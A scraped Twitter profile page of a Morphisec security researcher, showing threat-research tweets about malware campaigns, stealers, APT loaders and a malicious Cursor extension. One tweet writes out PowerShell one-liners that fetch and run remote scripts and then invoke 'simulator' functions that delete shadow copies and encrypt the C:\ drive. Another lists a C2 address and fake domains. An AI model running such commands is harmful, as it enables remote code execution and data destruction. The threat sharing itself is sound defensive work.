Nadav Lorber (@lnadav) 's Twitter Profile
Nadav Lorber

@lnadav

Security Researcher & Team Leader @Morphisec | Ex. IronSource & Verint

ID: 388286510

calendar_today10-10-2011 14:09:50

102 Tweet

495 Followers

202 Following

Hido Cohen (@0xhido) 's Twitter Profile Photo

A new infection chain we see a lot lately is used to deliver popular malware families Read my technical analysis of the new #SYK #Crypter and it's Discord loader at blog.morphisec.com/syk-crypter-di… VT Collection: virustotal.com/gui/collection…

A new infection chain we see a lot lately is used to deliver popular malware families

Read my technical analysis of the new #SYK #Crypter and it's Discord loader at blog.morphisec.com/syk-crypter-di…

VT Collection: virustotal.com/gui/collection…
Michael.Gorelik (@smgoreli) 's Twitter Profile Photo

working on my new simulator: IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-ShadowDeleteSIM -Mode All -Volume 'C:\' IEX (New-Object Net.WebClient).DownloadString("raw.githubusercontent.com/smgorelik/Rans…"); Invoke-RansomSIM -Mode Encrypt -Path 'C:\'

Itay Cohen 🌱 (@megabeets_) 's Twitter Profile Photo

Excited to share our latest research in which we detail a targeted Chinese espionage operation against defense institutes in Russia. The attacks, attributed to a group we call #TwistedPanda, deploy a multi-layered loader and a backdoor dubbed SPINNER. research.checkpoint.com/2022/twisted-p… 🧵>>

Arnold Osipov (@osipov_ar) 's Twitter Profile Photo

Hido Cohen and I recently discovered new changes in the #Donot #APT (AKA #APT-C-35) toolset Moreover, the team used a nice trick to evade the scanning of the remote template by checking if the User-agent contains “MSOffice”. More info: blog.morphisec.com/apt-c-35-new-w… Jazi SKII

<a href="/0xhido/">Hido Cohen</a> and I recently discovered new changes in the #Donot #APT (AKA #APT-C-35) toolset
Moreover, the team used a nice trick to evade the scanning of the remote template by checking if the User-agent contains “MSOffice”.
More info: blog.morphisec.com/apt-c-35-new-w…
<a href="/h2jazi/">Jazi</a> <a href="/SethKingHi/">SKII</a>
Nadav Lorber (@lnadav) 's Twitter Profile Photo

#ProxyShellMiner - An ongoing campaign that propagates within enterprise networks by exploiting Windows Exchange servers for initial access. Read more about it here: blog.morphisec.com/proxyshellmine…

Nadav Lorber (@lnadav) 's Twitter Profile Photo

Introducing #SYS01 #Stealer - an advanced stealer, packed with multiple stages in Rust, Python, and PHP for evading security solutions. Similar to the recent #S1deload campaigns. Thx to Arnold Osipov for this research Read more here: blog.morphisec.com/sys01stealer-f…

Introducing #SYS01 #Stealer - an advanced stealer, packed with multiple stages in Rust, Python, and PHP for evading security solutions. Similar to the recent #S1deload campaigns. Thx to <a href="/osipov_ar/">Arnold Osipov</a> for this research
Read more here: blog.morphisec.com/sys01stealer-f…
Arnold Osipov (@osipov_ar) 's Twitter Profile Photo

Ongoing #in2al5dp3in4er (invalid printer) loader delivering #Aurora stealer from a #MidJourney themed website. Still #FUD on VirusTotal - 0 detections! C2: 94.142.138[.]218:4561 Fake websites: midj0urney[.]org get.mid-journey[.]org/?gclid More info - blog.morphisec.com/in2al5d-p3in4er

Ongoing #in2al5dp3in4er (invalid printer) loader delivering #Aurora stealer from a #MidJourney themed website.
Still #FUD on VirusTotal - 0 detections!

C2: 94.142.138[.]218:4561
Fake websites:
midj0urney[.]org
get.mid-journey[.]org/?gclid

More info - blog.morphisec.com/in2al5d-p3in4er
Nadav Lorber (@lnadav) 's Twitter Profile Photo

Our new research is one of our best publications in recent years, if you are interested in the malware & threat domain it's a must-read!

Morphisec (@morphisec) 's Twitter Profile Photo

Throughout the year, Morphisec has learned much about the Chae$ 4 malware variant. On October 18th, our team will help you understand what is new and how it can impact your business. Reserve your spot at our 45-minute interactive webinar here: bit.ly/3PJOEPE!

Throughout the year, Morphisec has learned much about the Chae$ 4 malware variant.

On October 18th, our team will help you understand what is new and how it can impact your business.

Reserve your spot at our 45-minute interactive webinar here: bit.ly/3PJOEPE!
Virus Bulletin (@virusbtn) 's Twitter Profile Photo

Morphisec's Nadav Lorber analyses ResolverRAT, a newly identified remote access trojan that combines advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. morphisec.com/blog/new-malwa…

Morphisec's Nadav Lorber analyses ResolverRAT, a newly identified remote access trojan that combines advanced in-memory execution, API and resource resolution at runtime, and layered evasion techniques. morphisec.com/blog/new-malwa…
Nadav Lorber (@lnadav) 's Twitter Profile Photo

By 'implementing a waitlist' all they did was remove the installer download link from their site 🙄 You can just get the installer from other sources and first-time login will activate it! I'd expect more from AWS 😂

Krakovia (@krakovia_evm) 's Twitter Profile Photo

someone deployed a malware extension for Cursor but seems he forgot to delete promotional messages and the clear-text payload lol extra loot: download booster script

someone deployed a malware extension for <a href="/cursor_ai/">Cursor</a> but seems he forgot to delete promotional messages and the clear-text payload lol
extra loot: download booster script
vx-underground (@vxunderground) 's Twitter Profile Photo

One way to differentiate a real nerd from a phony nerd is their appreciation of stuff For example, someone may share an idea, or proof-of-concept, which illustrates something which is unusual A nerd will appreciate it for it's documentation and appreciation that someone has